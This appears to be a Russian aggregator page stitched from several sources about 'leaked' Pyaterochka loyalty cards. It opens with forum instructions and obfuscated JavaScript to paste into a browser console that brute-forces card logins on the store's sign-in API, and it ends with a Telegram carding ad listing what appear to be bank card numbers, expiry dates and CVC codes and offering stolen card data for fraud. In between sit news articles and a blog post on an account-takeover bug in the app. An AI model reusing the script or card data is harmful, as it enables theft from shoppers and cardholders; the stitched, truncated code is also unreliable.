номера карт пятерочки слив

Содержание

Слив темы с картами пятерочки с балансом

RuRuAres

Флудер

Все до безумия просто.

Для этого нам понадобятся:

— Браузер Google chrome или любой другой

(Используя режим Инкогнито Chrome)

Справа от вас откроется окно, смотрим на его верхнюю часть и переходим в раздел ‘Console’ Вот фото как это делается http://prntscr.com/km0tnf

C_START_CODE = ‘778900422367’, //базовая часть карты, меняете последние 4 цифры

V_COUNTER = 1; // всегда равна 1, не трогать

var _0x625b=[«\x4D\x61\x64\x65\x20\x62\x79\x20\x40\x6D\x72\x44\x6F\x6F\x64\x65″,»\x6C\x6F\x67»], _0x1ff4=[«\x70\x61\x64″,»\x70\x72\x6F\x74\x6F\x74\x79\x70\x65″,»\x30″,»\x6C\x65\x6E\x67\x74\x68″,»\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\u0430\u0431\u0432\u0433\u0434\u0435\u0451\u0436\u0437\u0438\u0439\u043A\u043B\u043C\u043D\u043E\u043F\u0440\u0441\u0442\u0443\u0444\u0445\u0446\u0447\u0448\u0449\u044A\u044B\u044C\u044D\u044E\u044F\u0410\u0411\u0412\u0413\u0414\u0415\u0401\u0416\u0417\u0418\u0419\u041A\u041B\u041C\u041D\u041E\u041F\u0420\u0421\u0422\u0423\u0424\u0425\u0426\u0427\u0428\u0429\u042A\u042B\u042C\u042D\u042E\u042F\x21\x2C\x2E\x2D\x5F\x3D\x23\x24\x25\x5E\x26\x2A\x28\x29″,»»,»\x72\x61\x6E\x64\x6F\x6D»,»\x66\x6C\x6F\x6F\x72″,»\x63\x68\x61\x72\x41\x74″,»\x2F\x61\x70\x69\x2F\x76\x31\x2F\x61\x75\x74\x68\x2F\x73\x69\x67\x6E\x69\x6E»,»\x7B\x22\x6C\x6F\x67\x69\x6E\x22\x3A\x22″,»\x22\x2C\x22\x70\x61\x73\x73\x77\x6F\x72\x64\x22\x3A\x22″,»\x22\x2C\x22\x73\x63\x68\x65\x6D\x61\x22\x3A\x22\x62\x79\x2D\x63\x61\x72\x64\x22\x7D»,»\x50\x4F\x53\x54″,»\x6F\x70\x65\x6E»,»\x41\x63\x63\x65\x70\x74″,»\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E\x2C\x20\x74\x65\x78\x74\x2F\x70\x6C\x61\x69\x6E\x2C\x20\x2A\x2F\x2A»,»\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72″,»\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65″,»\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x6A\x73\x6F\x6E\x3B\x63\x68\x61\x72\x73\x65\x74\x3D\x55\x54\x46\x2D\x38″,»\x58\x2D\x41\x75\x74\x68\x6F\x72\x69\x7A\x61\x74\x69\x6F\x6E»,»\x28\x3F\x3A\x5E\x7C\x3B\x20\x29″,»\x5C\x24\x31″,»\x72\x65\x70\x6C\x61\x63\x65″,»\x74\x6F\x6B\x65\x6E»,»\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29″,»\x6D\x61\x74\x63\x68″,»\x63\x6F\x6F\x6B\x69\x65″,»\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65″,»\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65″,»\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74″,»\x70\x61\x72\x73\x65″,»\x73\x74\x61\x74\x75\x73″,»\x0A»,»\x6C\x6F\x67″,»\x73\x65\x6E\x64″];Number[_0x1ff4[1]][_0x1ff4[0]]= function(_0x3aebx1);_0x3aebxf[_0x1ff4[14]](_0x1ff4[13],_0x3aebx10,true);_0x3aebxf[_0x1ff4[17]](_0x1ff4[15],_0x1ff4[16]);_0x3aebxf[_0x1ff4[17]](_0x1ff4[18],_0x1ff4[19]);_0x3aebxf[_0x1ff4[17]](_0x1ff4[20],decodeURIComponent(document[_0x1ff4[27]][_0x1ff4[26]]( new RegExp(_0x1ff4[21]+ _0x1ff4[24][_0x1ff4[23]](/([\.$?*|<>\(\)\[\]\\\/\+^])/g,_0x1ff4[22])+ _0x1ff4[25]))[1]));_0x3aebxf[_0x1ff4[28]]= function();if(++acsasfeaazz

Источник

Пожизненная скидка в «Пятёрочке» и Nike. Как народ «взламывает» карты лояльности

Карты лояльности сегодня есть у всех. Но часто от них нет никакой пользы: мало баллов, а скидка настолько маленькая, что ради неё лень даже открывать кошелёк. Но Лайф узнал, как получить большую скидку и много баллов почти в любом магазине и за несколько минут. «Пятёрочка», «Перекрёсток», Adidas, Nike, «Рив Гош», «Л‘Этуаль» — все там. С удовольствием делимся этим лайфхаком.

Коллаж © LIFE. Фото © Shutterstock

Карты лояльности, они же бонусные, скидочные или дисконтные, уже давно соседствуют с банковским «пластиком» в кошельках и бумажниках россиян. По большей части они делятся на два типа: накопительные и скидочные. В первом случае магазин закрепляет за картой счёт, на который выводит кешбэк с покупок в виде баллов. Во втором — за картой закрепляется перманентная скидка. Сначала минимальная (в лучшем случае 5%), а потом максимальная (уже вполне ощутимые 20 или даже 30%).

Например, вездесущая «Пятёрочка» возвращает один балл с каждых потраченных 20 рублей. При этом балл эквивалентен не рублю, а всего десяти копейкам, то есть, чтобы получить один рубль кешбэка, нужно потратить 200 рублей. Аналогичная система работает в «Перекрёстке», «Карусели» и ряде других торговых сетей.

Примером скидочной карты пусть будет «пластик» из магазина косметики «Иль де Ботэ». Скидка начального уровня — 10%. Её можно «прокачать» до 15%, 20% и даже до 25%. Последняя — очень привлекательна. Но до неё непросто добраться. Ведь для VIP-статуса нужно закупиться товарами на 50 000 рублей. Наверняка найдутся те, кто готов отдать такие деньги за раз, но у большинства сумма будет копиться месяцами, если не годами. Похожая ситуация с магазином зоотоваров «Бетховен».

Большая часть лояльного «пластика» в наших кошельках по этой причине является если не бесполезной, то неэффективной. Но есть способы исправить ситуацию в лучшую сторону.

Источник

Майнинг еды или «Пятерочка» глазами хакера

Введение

Немного о безопасности личных кабинетов

image loader

Как мы видим войти в личный кабинет можно используя номер телефона и пароль, но не всё так просто. После ввода данных появляется окно для ввода смс кода, который был отправлен на телефон владельца.

image loader

Казалось бы, как взломать такое? Перебрать код невозможно, есть лишь 3 попытки, а код четырёхзначный. Сразу отбрасываем данный вариант, но хакерам же как-то удаётся, значит и у нас получится!

Приложение «Пятерочка»

Как и у любого другого магазина с программой лояльности у сети магазинов «Пятерочка» есть своё приложение. Только вот приложение не простое, а со своими тараканами в коде. Давайте же разберёмся, что не так с приложением.

Вход в личный кабинет осуществляется так же с помощью номера телефона и пароля, а ещё сверху приходит смс подтверждение, но вот есть один интересный момент. Приложение «запоминает» учётную запись и при следующей попытке входа вместо смс кода на телефон отправляет пуш уведомление напрямую в приложение. Сейчас объясню поподробнее. Войдя впервые на свою учётную запись вам предстоит ввести код из смс для входа. Если вы по какой-то причине решили выйти и зайти снова, то во второй и последующие разы смс код вам приходить не будет, а вместо него в приложении будет само заполняться поле смс кода. Во диво! Сделано это конечно красиво, но есть один огромный недостаток. Замечен баг был мной в приложении «Пятерочка» версии 2.12.1, возможно есть и в других версиях. Что за баг и как его повторить?

Ниже вы можете лицезреть два видео, сняты они были не мной, но они очень наглядно показывают всю проблемы пуш уведомлений и бага приложения.

В первом видео видно, как хакер вводит данные для входа, после чего принимает смс на телефон и заходит в свой аккаунт. После чего выходит и проходит авторизацию снова. Во второй раз нам прекрасно видно, что никакая смс на телефон не приходит и поле для ввода автоматически заполняется пуш уведомлением.»

Во втором видео злоумышленник уже пытается войти в аккаунт не принадлежащий ему. Он вводит данные, но кода из смс он не знает по понятным причинам. Потом он убирает приложение из процессов и запускает его снова. На этом моменте прекрасно виден баг приложения. Открывается совершенно белое окно, после чего злоумышленник выходит из аккаунта. После чего вводит данные для входа повторно и о чудо, ему приходит пуш уведомление! Почему же такое произошло? Спросить надо у разработчиков приложения…

Методы решения

Лично я могу посоветовать разработчикам отключить пуш уведомления, что злоумышленники не могли взламывать аккаунты. Отключить конечно же на время до решения проблемы. Сам я не силён в разработке приложений и ничего дельного посоветовать не могу, но пуш уведомления они до сих пор не отключили.

Последствия

Из-за ошибки в коде страдают обычные люди, а именно добросовестные покупатели. Почитать гневные отзывы о том, что у людей украли баллы можно по ссылке: vk.com/topic-19098821_24191218. Ниже оставлю пару постов, на самом деле их намного больше, но думаю сейчас уже не смогу найти некоторые.

image loader

image loader

image loader

Проблема с воровством баллов очень актуальна и процветает это дело минимум год. Даже на пикабу можно найти посты.

Выводы

Не бывает идеальных приложений, но этот баг ужасен. Я не призываю вас преступать закон и особенно воровать что-то у кого-то! Пост был создан с целью исправить баг и достучаться до разработчиков приложения (письмо отправлял им больше месяца назад и результата ноль).

Всем добра и не допускайте таких ошибок в коде!»

Источник

«Пятерочка» для хакеров

Анатолий Костырев о «взломе» бонусных карт

Массовая раздача бонусных карт, которую практикуют торговые сети, стремясь увеличить число лояльных покупателей, может обернуться для них неприятными последствиями. Выяснилась схема незаконного получения баллов по «Выручай-карте» — программе лояльности торговой сети «Пятерочка» (входит в X5 Retail Group). Программа была запущена в августе 2017 года, и число ее пользователей сегодня превышает 30 млн человек. Держатели «Выручай-карты» получают один балл за каждые 20 руб. в чеке до 555 руб. Также предусмотрены баллы при покупке на большую сумму и при определенной частоте покупок за конкретный период. Обменять баллы на товары в «Пятерочке» можно по соотношению десять баллов на 1 руб. в чеке. Но нашлись и более выгодные условия.

KMO 168130 00503 1 t218 204133

Фото: Глеб Щелкунов, Коммерсантъ

Telegram-канал «Денежный» предлагает следующую схему. Желающий получить «бесплатные» баллы по «Выручай-карте» должен ввести в своем браузере при заходе на сайт «Пятерочки» специальный скрипт. С помощью подбора пароля код позволяет получить номера выданных карт, не привязанных к телефонам. После карту необходимо активировать в мобильном приложении, привязав для СМС-подтверждения к временному номеру, который также можно получить онлайн. Теперь пользователю должны стать доступны все бонусы, начисленные на карту, которые можно потратить с помощью мобильного приложения. В группах «ВКонтакте» уже появились объявления о продаже баллов по «Выручай-карте» за 40% от стоимости. Говорить о серьезных убытках от подобной схемы для «Пятерочки» вряд ли пока стоит. Опробовавший способ посетитель магазина сети опубликовал фотографию чека, из которой следует, что он приобрел на баллы напиток Red Bull и хлеб общей стоимостью около 94 руб.

Как хакеры похищают деньги с банковских карт

В X5 сообщили: «Компетентные службы компании в реальном времени следят за ситуацией и при выявлении уязвимостей устраняют их». Но сколько подобных схем может появиться в будущем, сказать невозможно, да и вряд ли «взломщики» ограничатся «Пятерочкой». Так, на портале Habr еще в конце 2018 года сообщали об уязвимости в программе лояльности «Ленты». А свои бонусные карты сегодня есть уже почти у всех торговых сетей. В «Ленте» заявили, что фиксировали единичные случаи взлома карт и работают над устранением обнаруженной уязвимости. Но процесс может затянуться на неопределенный срок. Обнаруженная в 2016 году возможность бесплатно «пополнять» баланс московской транспортной карты «Тройка», как уверяют ее пользователи, работает до сих пор. Возможно, ритейлерам стоило уделять больше внимания вопросам безопасности перед началом массовой выдачи карт лояльности, чтобы не приходилось латать «дыры» по горячим следам. Не стоит исключать и то, что незаконная добыча баллов «Пятерочки» будет все более популярной: кризис, видимо, повышает изобретательность потребителей.

Источник

Номера карт пятерочки слив

КАРТЫ С БАЛАНСОМ
afd2b23be2afcf9ef020fe9d78991d98

793 подписчиков
0 просмотров на пост

Детальная рекламная статистика будет доступна после прохождения простой процедуры регистрации

DspFjz82CoM

Telemetr.me Подписаться

Найдено 4 поста

Для тех, кто пришёл по делу — можете писать сразу в лс.

В боте отображаются не все карты, наличие — около 50, плюс-минус указанный баланс.

Для тех, кто хочет проверить: ловите парочку, пока все не вывели.

💳 Номер карты: 4276160986954957
🕰 Срок действия: 10/22
🃏 CVC-код: 291

[Баланс]: 15925 рублей

💳 Номер карты: 5469380047007843
🕰 Срок действия: 03/23
🃏 CVC-код: 481

[Баланс]: 5150 рублей

💳 Номер карты: 4279500017675310
🕰 Срок действия: 02/24
🃏 CVC-код: 121

[Баланс]: 31300 рублей

💳 Номер карты: 5336690040111793
🕰 Срок действия: 05/23
🃏 CVC-код: 655

[Баланс]: 9753 рублей

💳 Номер карты: 4276090015074800
🕰 Срок действия: 10/21
🃏 CVC-код: 795

[Баланс]: 19500 рублей

ПРОДАЮ ДАННЫЕ ОТ КАРТ С БАЛАНСОМ

Идеал для вбива на BOOKING, ALIEXPRESS, других площадках без ебаного подтверждения по смс 🙂

В наличии:
— Тинькофф от 1к до 10к;
— Альфа от 1к до 30к;
— Карты Европы и США до 100к в пересчете по курсу;

Источник

Поделиться с друзьями
admin
Информационный справочник обо всем
Adblock
detector